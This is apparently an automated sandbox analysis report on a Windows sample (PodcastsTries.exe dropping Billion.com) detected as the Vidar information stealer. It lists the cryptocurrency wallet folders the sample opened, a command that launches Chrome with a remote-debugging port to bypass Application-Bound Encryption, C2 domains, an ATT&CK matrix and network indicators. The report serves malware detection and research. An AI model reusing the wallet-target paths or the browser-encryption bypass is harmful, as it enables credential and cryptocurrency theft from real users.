                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Billion.comBinary or memory string: WIN_81
                Source: Billion.comBinary or memory string: WIN_XP
                Source: Billion.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Billion.comBinary or memory string: WIN_XPe
                Source: Billion.comBinary or memory string: WIN_VISTA
                Source: Billion.comBinary or memory string: WIN_7
                Source: Billion.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3329936932.000000000446D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001B2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_001B2263
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001B1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_001B1C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter                		Logon Script (Windows)2
                Valid Accounts                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
                Process Injection                		111
                Masquerading                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion                		DCSync11
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                Process Injection                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580498 Sample: PodcastsTries.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 71 bijutr.shop 2->71 73 t.me 2->73 75 NsxXzupCMoDsL.NsxXzupCMoDsL 2->75 99 Suricata IDS alerts for network traffic 2->99 101 Found malware configuration 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 5 other signatures 2->105 10 PodcastsTries.exe 22 2->10         started        12 msedge.exe 2->12         started        15 msedge.exe 2->15         started        signatures3 process4 signatures5 17 cmd.exe 2 10->17         started        109 Maps a DLL or memory area into another process 12->109 21 msedge.exe 12->21         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        30 2 other processes 12->30 28 msedge.exe 15->28         started        process6 dnsIp7 63 C:\Users\user\AppData\Local\...\Billion.com, PE32 17->63 dropped 97 Drops PE files with a suspicious file extension 17->97 32 Billion.com 29 17->32         started        36 cmd.exe 2 17->36         started        38 extrac32.exe 18 17->38         started        40 8 other processes 17->40 77 sb.scorecardresearch.com 18.161.69.30, 443, 49982 MIT-GATEWAYSUS United States 21->77 79 20.110.205.119, 443, 50050 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->79 81 16 other IPs or domains 21->81 file8 signatures9 process10 dnsIp11 65 bijutr.shop 188.245.216.205, 443, 49800, 49806 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 32->65 67 t.me 149.154.167.99, 443, 49792 TELEGRAMRU United Kingdom 32->67 69 127.0.0.1 unknown unknown 32->69 89 Attempt to bypass Chrome Application-Bound Encryption 32->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 32->91 93 Found API chain indicative of sandbox detection 32->93 95 4 other signatures 32->95 42 msedge.exe 2 10 32->42         started        45 msedge.exe 32->45         started        47 chrome.exe 32->47         started        50 cmd.exe 32->50         started        signatures12 process13 dnsIp14 107 Monitors registry run keys for changes 42->107 52 msedge.exe 42->52         started        54 msedge.exe 45->54         started        85 192.168.2.6, 443, 49623, 49700 unknown unknown 47->85 87 239.255.255.250 unknown Reserved 47->87 56 chrome.exe 47->56         started        59 conhost.exe 50->59         started        61 timeout.exe 50->61         started        signatures15 process16 dnsIp17 83 www.google.com 142.250.181.68, 443, 49852, 49853 GOOGLEUS United States 56->83

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PodcastsTries.exe11%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\680662\Billion.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
                http://anglebug.com/358670%Avira URL Cloudsafe
                http://anglebug.com/6876F0%Avira URL Cloudsafe
                http://anglebug.com/8229I0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bijutr.shop
                		188.245.216.205
                		truetrue
                  		unknown
                  chrome.cloudflare-dns.com
                  		162.159.61.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		18.161.69.30
                        		truefalse
                          		high
                          www.google.com
                          		142.250.181.68
                          		truefalse
                            		high
                            googlehosted.l.googleusercontent.com
                            		142.250.181.65
                            		truefalse
                              		high
                              clients2.googleusercontent.com
                              		unknown
                              		unknownfalse
                                		high
                                bzib.nelreports.net
                                		unknown
                                		unknownfalse
                                  		high
                                  assets.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    c.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      ntp.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        api.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          NsxXzupCMoDsL.NsxXzupCMoDsL
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921021&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                              		high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920167&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabBillion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drfalse
                                                  		high
                                                  https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drfalse
                                                      		high
                                                      https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000012.00000002.2808511544.000027800009C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/document/Jchrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ntp.msn.com/_defaultQuotaManager.27.drfalse
                                                                  		high
                                                                  http://anglebug.com/4633chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://anglebug.com/7382chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://issuetracker.google.com/284462263msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.drfalse
                                                                          		high
                                                                          http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0PodcastsTries.exefalse
                                                                            		high
                                                                            http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_PodcastsTries.exefalse
                                                                              		high
                                                                              https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737269759.0000278001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737330665.0000278001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809303910.00002780002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738791399.0000278000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738731573.0000278000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737386416.0000278000F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809977476.00002780004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737360460.0000278001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738761959.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737419840.000027800104C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/manifest.json.27.drfalse
                                                                                    		high
                                                                                    https://docs.google.com/document/:chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Zhchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000012.00000002.2811895050.00002780009E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://anglebug.com/7714chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://anglebug.com/35867chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://unisolated.invalid/chrome.exe, 00000012.00000002.2812036983.0000278000A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/tools/feedback/chrome/__submitage.Incoming.ThirdPartyToThirdParty.SameBucketXchrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.google.com/chrome/tips/chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813807994.0000278000D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811819315.0000278000984000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://anglebug.com/6876Fchrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://drive.google.com/?lfhs=2chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://anglebug.com/6248chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/8229Ichrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://anglebug.com/6929chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Ynchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/5281chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneschrome.exe, 00000012.00000002.2816170246.0000278000F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.youtube.com/?feature=ytcachrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
